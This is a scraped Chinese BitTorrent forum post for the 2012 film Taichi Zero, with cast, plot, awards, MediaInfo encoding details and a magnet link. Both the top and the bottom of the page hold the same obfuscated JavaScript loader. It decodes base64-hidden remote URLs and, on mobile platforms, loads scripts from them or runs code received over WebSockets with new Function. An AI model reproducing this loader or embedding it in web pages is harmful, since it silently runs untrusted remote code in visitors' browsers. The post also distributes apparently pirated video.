太极1:从零开始[国语配音/中文字幕].Taichi.Zero.2012.1080p.BluRay.x265.10bit.DTS.5.1 6.11GB

版主小s 13天前 140

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 太极1:从零开始 / 太极 / 太极之从零开始 / Taichi 0 / TaiChi

◎年 代 2012

◎产 地 中国大陆

◎类 别 喜剧 / 动作 / 奇幻 / 武侠 / 古装

◎语 言 汉语普通话

◎上映日期 2012-09-27(中国大陆) / 2012-10-19(美国)

◎IMDb链接 https://www.imdb.com/title/tt1981080/

◎豆瓣评分 5.7/10 (94641人评价)

◎豆瓣链接 https://movie.douban.com/subject/5996800/

◎片 长 99分钟

◎导 演 冯德伦 Stephen Fung (id:1023278)

◎编 剧 张家鲁 Chia-lu Chang (id:1274308)

程孝泽 Hsiao-tse Cheng (id:1312781)

陈国富 Kuo-fu Chen (id:1075862)

◎演 员 袁晓超 Xiaochao Yuan (id:1323426)

梁家辉 Tony Leung (id:1118167)

杨颖 Angelababy (id:1033011)

彭于晏 Eddie Peng (id:1013782)

冯绍峰 Shaofeng Feng (id:1275721)

舒淇 Qi Shu (id:1138320)

刘伟强 Andrew Lau (id:1106979)

谢欣颖 Nikki Hsin-Ying Hsieh (id:1275639)

熊欣欣 Xinxin Xiong (id:1033090)

冯克安 Hark-On Fung (id:1283563)

梁小龙 Siu-Lung Leung (id:1274267)

陈思诚 Sicheng Chen (id:1274763)

熊乃瑾 Naijin Xiong (id:1314041)

英达 Da Ying (id:1011479)

冯德伦 Stephen Fung (id:1023278)

刘碧丽 Mandy Lieu (id:1314223)

陈浩 Hao Chen (id:1329520)

闫龙飞 Marc Philip Goodman (id:1371132)

艾文·科蒂克 Ivan Kotik (id:1336758)

吴彦祖 Daniel Wu (id:1027502)

申思 Si Shen (id:1324044)

勃小龙 Pierre Bourdaud (id:1371197)

马修·雷·鲁格斯 Matthew Ray Ruggles (id:1379178)

吴品儒 Ng Ban-Yu (id:1358616)

吴彦祖 Daniel Wu (id:1027502)

陈国富 Kuo-fu Chen (id:1075862)

冯德伦 Stephen Fung (id:1023278)

杨庭恺 Bernard Yang (id:1443208)

黎耀辉 Yiu-Fai Lai (id:1289265)

张家鲁 Chia-lu Chang (id:1274308)

程孝泽 Hsiao-tse Cheng (id:1312781)

肖洋 Yang Xiao (id:1331182)

叶锦添 Timmy Yip (id:1301493)

星汉 (id:1391218)

黄迪 Marina Huang (id:1427970)

吴品儒 Ng Ban-Yu (id:1358616)

李菲 Fei Li (id:1400568)

赵楠 Nan Zhao (id:1325307)

吴炫辉 Yuen Fai Ng (id:1275160)

洪金宝 Sammo Hung Kam-Bo (id:1055887)

林克明 Ke Ming Lin (id:1360416)

申思 Si Shen (id:1324044)

黄海 Hai Huang (id:1401245)

◎标 签 动作 / 中国 / 武侠 / 喜剧 / 2012 / 搞笑 / 剧情 / 蒸汽朋克

◎简 介

清朝中叶,内忧外患,传统崩溃,民生凋敝。小男孩杨露禅额头天生肉角、相貌奇异,却只会吃和傻笑,大家认定他这辈子只能混吃等死,唯独杨母(舒淇 饰)认为儿子露禅(袁晓超 饰)天赋异禀,将来必成大器。随着年龄增长,露禅渐渐展现异于常人的能力——对于种种拳脚招式,过目不忘,尤其是头顶肉角一旦被触动,更是力大无穷,无人能敌。高人指出,如能善用此天赋,他将成为绝顶高手,但若放任其颜色由红转黑,必有性命之虞。露禅一路颠沛流离来到陈家沟——太极拳的发源地,希望学拳保命。孰料陈家拳不传外人,所幸有神秘老人(梁家辉 饰)总在关键时刻暗中指点,露禅进步神速,令村民刮目相看。一向平静的山村,因为朝廷修筑铁道面临灭村危机。在陈家沟成长,从英国学成归国的直隶铁道总监造方子敬(彭于晏 饰),为了自己的前途,不惜牺牲乡亲的利益。玉娘(杨颖 饰)与子敬青梅竹马,面对爱人背叛,伤心欲绝,...

◎获奖情况 (共11项)

第49届台北金马影展 (2012)

金马奖 最佳造型设计(提名)

└──叶锦添 (id:1301493)

金马奖 最佳动作设计(提名)

└──洪金宝 (id:1055887)

第32届香港电影金像奖 (2013)

最佳新演员(提名)

└──袁晓超 (id:1323426)

最佳美术指导(提名)

└──叶锦添 (id:1301493)

最佳服装造型设计(提名)

└──叶锦添 (id:1301493)

最佳动作设计(提名)

└──洪金宝 (id:1055887)

最佳视觉效果(提名)

第3届豆瓣电影鑫像奖 (2013)

豆渣单元 最渣影片(华语)(提名)

豆渣单元 最渣导演(华语)(提名)

└──冯德伦 (id:1023278)

豆渣单元 最渣男演员(华语)(提名)

└──袁晓超 (id:1323426)

豆渣单元 最渣女演员(华语)(提名)

└──杨颖 (id:1033011)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 299572341907622098538727359446847917084 (0xE15F88CD1013E400A6D3F11394CD0C1C)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.11 GiB

  8. Duration : 1 h 38 min

  9. Overall bit rate : 8 911 kb/s

  10. Movie name : Taichi Zero 2012

  11. Encoded date : UTC 2021-10-11 14:06:23

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 38 min

  21. Bit rate : 7 373 kb/s

  22. Width : 1 920 pixels

  23. Height : 816 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.196

  31. Stream size : 5.05 GiB (83%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=19.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541049583 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Language : Chinese

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 38 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 510 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 1.03 GiB (17%)

  52. Title : Mandarin

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 33 min

  63. Bit rate : 18.8 kb/s

  64. Count of elements : 1924

  65. Stream size : 12.5 MiB (0%)

  66. Title : cht

  67. Language : Chinese

  68. Default : No

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 33 min

  77. Bit rate : 18.7 kb/s

  78. Count of elements : 1924

  79. Stream size : 12.5 MiB (0%)

  80. Title : chs

  81. Language : Chinese

  82. Default : Yes

  83. Forced : No


  84. Text #3

  85. ID : 5

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 33 min

  91. Bit rate : 29.1 kb/s

  92. Count of elements : 2226

  93. Stream size : 19.5 MiB (0%)

  94. Title : eng

  95. Language : English

  96. Default : No

  97. Forced : No


  98. Menu #1

  99. 00:00:00.000 : :第 01 章

  100. 00:09:28.651 : :第 02 章

  101. 00:17:01.854 : :第 03 章

  102. 00:25:25.649 : :第 04 章

  103. 00:33:32.594 : :第 05 章

  104. 00:41:11.594 : :第 06 章

  105. 00:51:42.975 : :第 07 章

  106. 00:59:38.116 : :第 08 章

  107. 01:05:58.079 : :第 09 章

  108. 01:13:33.242 : :第 10 章

  109. 01:21:55.327 : :第 11 章

  110. 01:31:43.790 : :第 12 章


  111. Menu #2

  112. 00:00:00.000 : 第 01 章

  113. 00:09:28.651 : 第 02 章

  114. 00:17:01.854 : 第 03 章

  115. 00:25:25.649 : 第 04 章

  116. 00:33:32.593 : 第 05 章

  117. 00:41:11.594 : 第 06 章

  118. 00:51:42.974 : 第 07 章

  119. 00:59:38.116 : 第 08 章

  120. 01:05:58.079 : 第 09 章

  121. 01:13:33.242 : 第 10 章

  122. 01:21:55.327 : 第 11 章

  123. 01:31:43.789 : 第 12 章




复制代码


TAGS 武侠 动作 奇幻 喜剧 古装

磁力链:
  • magnet:?xt=urn:btih:F3995E141250521B51FBBF0D7C52F0C415434FFE

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};